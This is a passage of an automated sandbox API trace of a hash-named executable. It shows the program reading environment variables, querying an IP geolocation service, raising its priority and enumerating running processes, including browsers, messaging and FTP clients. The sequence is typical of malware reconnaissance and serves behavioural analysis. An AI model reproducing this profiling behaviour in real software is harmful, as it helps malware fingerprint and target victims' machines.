dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0084.063] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x16) returned 0x741788 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x741788, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0084.063] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x80 [0084.063] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x84) returned 0x741870 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0084.063] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x13) returned 0x7417a8 [0084.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x7417a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0084.064] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x84 [0084.064] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x88) returned 0x741870 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0084.064] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x1f) returned 0x73ec10 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x73ec10, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0084.064] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x88 [0084.064] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x8c) returned 0x741870 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0084.064] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x12) returned 0x7417c8 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7417c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0084.064] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x8c [0084.064] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x90) returned 0x741870 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0084.064] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x18) returned 0x741908 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x741908, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0084.064] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741870) returned 0x90 [0084.064] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741870, Size=0x94) returned 0x741928 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0084.064] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x8, Size=0x46) returned 0x736e80 [0084.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x736e80, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0084.064] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x741928) returned 0x94 [0084.064] RtlReAllocateHeap (Heap=0x720000, Flags=0x0, Ptr=0x741928, Size=0x98) returned 0x741928 [0084.148] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.149] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.149] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.187] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x8ec) returned 0x7419c8 [0084.187] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.187] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x10) returned 0x733208 [0084.188] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.188] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.188] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.219] RtlSizeHeap (HeapHandle=0x720000, Flags=0x0, MemoryPointer=0x740e70) returned 0x80 [0084.246] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0085.540] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x40) returned 0x732790 [0085.546] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0095.972] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0095.973] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0095.973] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0095.973] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x20) returned 0x748668 [0095.983] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x240) returned 0x757600 [0095.992] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x757600 | out: hHeap=0x720000) returned 1 [0095.992] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x748668 | out: hHeap=0x720000) returned 1 [0095.993] HeapFree (in: hHeap=0x720000, dwFlags=0x0, lpMem=0x732790 | out: hHeap=0x720000) returned 1 [0095.993] GetCurrentProcess () returned 0xffffffff [0095.993] GetLastError () returned 0x0 [0095.993] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0096.009] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x10) returned 0x757218 [0096.009] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x8ec) returned 0x2a17940 [0096.064] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x800) returned 0x75c210 [0096.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x75c210, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0096.065] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\Desktop") returned 1 [0096.073] RtlAllocateHeap (HeapHandle=0x720000, Flags=0x0, Size=0x810) returned 0x2a18238 [0096.073] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0096.073] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" ", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x7f0a10*="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.074] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.080] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0096.081] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" ", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x7f0a10*="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.081] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned="0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" [0096.081] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x752b0000 [0096.081] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcesses") returned 0x0 [0096.081] GetProcAddress (hModule=0x752b0000, lpProcName="EnumProcessModules") returned 0x0 [0096.081] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0096.081] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75950000 [0096.142] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcesses") returned 0x75951544 [0096.142] GetProcAddress (hModule=0x75950000, lpProcName="EnumProcessModules") returned 0x75951408 [0096.142] GetProcAddress (hModule=0x75950000, lpProcName="GetModuleBaseNameW") returned 0x7595152c [0096.142] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.152] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x0 [0096.152] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1a8) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0096.153] CloseHandle (hObject=0x0) returned 0 [0096.153] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0096.154] CloseHandle (hObject=0x0) returned 0 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0096.154] CloseHandle (hObject=0x0) returned 0 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0096.154] CloseHandle (hObject=0x0) returned 0 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x0 [0096.154] CloseHandle (hObject=0x0) returned 0 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x474) returned 0x4e8 [0096.154] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0096.154] CloseHandle (hObject=0x4e8) returned 1 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x494) returned 0x0 [0096.154] CloseHandle (hObject=0x0) returned 0 [0096.154] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x520) returned 0x0 [0096.155] CloseHandle (hObject=0x0) returned 0 [0096.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x0 [0096.155] CloseHandle (hObject=0x0) returned 0 [0096.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x770) returned 0x4e8 [0096.155] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0096.155] CloseHandle (hObject=0x4e8) returned 1 [0096.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x77c) returned 0x4e8 [0096.155] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0096.155] CloseHandle (hObject=0x4e8) returned 1 [0096.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x398) returned 0x0 [0096.155] CloseHandle (hObject=0x0) returned 0 [0096.155] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0096.155] CloseHandle (hObject=0x0) returned 0 [0096.156] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x300) returned 0x0 [0096.156] CloseHandle (hObject=0x0) returned 0 [0096.156] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7c4) returned 0x0 [0096.156] CloseHandle (hObject=0x0) returned 0 [0096.156] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x594) returned 0x0 [0096.156] CloseHandle (hObject=0x0) returned 0 [0096.156] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x744) returned 0x4e8 [0096.156] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.160] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0096.160] CloseHandle (hObject=0x4e8) returned 1 [0096.161] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x818) returned 0x4e8 [0096.161] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.166] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xc50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="iexplore.exe") returned 0xc [0096.166] CloseHandle (hObject=0x4e8) returned 1 [0096.166] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x4e8 [0096.167] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.170] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x11b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="moment_free.exe") returned 0xf [0096.170] CloseHandle (hObject=0x4e8) returned 1 [0096.170] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x4e8 [0096.170] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.171] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="light.exe") returned 0x9 [0096.172] CloseHandle (hObject=0x4e8) returned 1 [0096.172] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x4e8 [0096.172] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.173] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x2d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="racestreetsong.exe") returned 0x12 [0096.174] CloseHandle (hObject=0x4e8) returned 1 [0096.174] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x4e8 [0096.174] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.175] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x980000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="western hard.exe") returned 0x10 [0096.175] CloseHandle (hObject=0x4e8) returned 1 [0096.175] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x4e8 [0096.175] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.177] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3e0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatcompany.exe") returned 0xf [0096.177] CloseHandle (hObject=0x4e8) returned 1 [0096.177] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x4e8 [0096.177] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.178] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa50000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="power-more.exe") returned 0xe [0096.179] CloseHandle (hObject=0x4e8) returned 1 [0096.179] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x4e8 [0096.179] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.180] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x310000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="itself read.exe") returned 0xf [0096.180] CloseHandle (hObject=0x4e8) returned 1 [0096.180] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x4e8 [0096.181] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.183] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xb40000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="agreement.exe") returned 0xd [0096.183] CloseHandle (hObject=0x4e8) returned 1 [0096.183] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x4e8 [0096.183] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.185] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xf60000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="water-week.exe") returned 0xe [0096.185] CloseHandle (hObject=0x4e8) returned 1 [0096.185] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x4e8 [0096.185] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.187] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0xa10000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="which_oil.exe") returned 0xd [0096.187] CloseHandle (hObject=0x4e8) returned 1 [0096.187] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x4e8 [0096.187] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.188] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x170000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="justopportunityacross.exe") returned 0x19 [0096.188] CloseHandle (hObject=0x4e8) returned 1 [0096.188] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x974) returned 0x4e8 [0096.189] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.190] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x330000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="tax_work.exe") returned 0xc [0096.190] CloseHandle (hObject=0x4e8) returned 1 [0096.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x4e8 [0096.190] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.191] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x1050000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="receive former.exe") returned 0x12 [0096.192] CloseHandle (hObject=0x4e8) returned 1 [0096.192] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9b0) returned 0x4e8 [0096.192] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.193] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x8f0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="office.exe") returned 0xa [0096.193] CloseHandle (hObject=0x4e8) returned 1 [0096.193] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x4e8 [0096.193] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.195] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x12d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="civil.exe") returned 0x9 [0096.195] CloseHandle (hObject=0x4e8) returned 1 [0096.195] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb48) returned 0x4e8 [0096.195] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.197] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3d0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0096.198] CloseHandle (hObject=0x4e8) returned 1 [0096.198] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb50) returned 0x4e8 [0096.198] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.199] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x3b0000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0096.199] CloseHandle (hObject=0x4e8) returned 1 [0096.200] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb58) returned 0x4e8 [0096.200] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.201] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x950000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0096.201] CloseHandle (hObject=0x4e8) returned 1 [0096.201] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb60) returned 0x4e8 [0096.201] EnumProcessModules (in: hProcess=0x4e8, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0096.204] GetModuleBaseNameW (in: hProcess=0x4e8, hModule=0x280000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0096.204] CloseHandle (hObject=0x4e8) returned 1 [0096.204] OpenProcess (dwDesiredAccess=0x410, 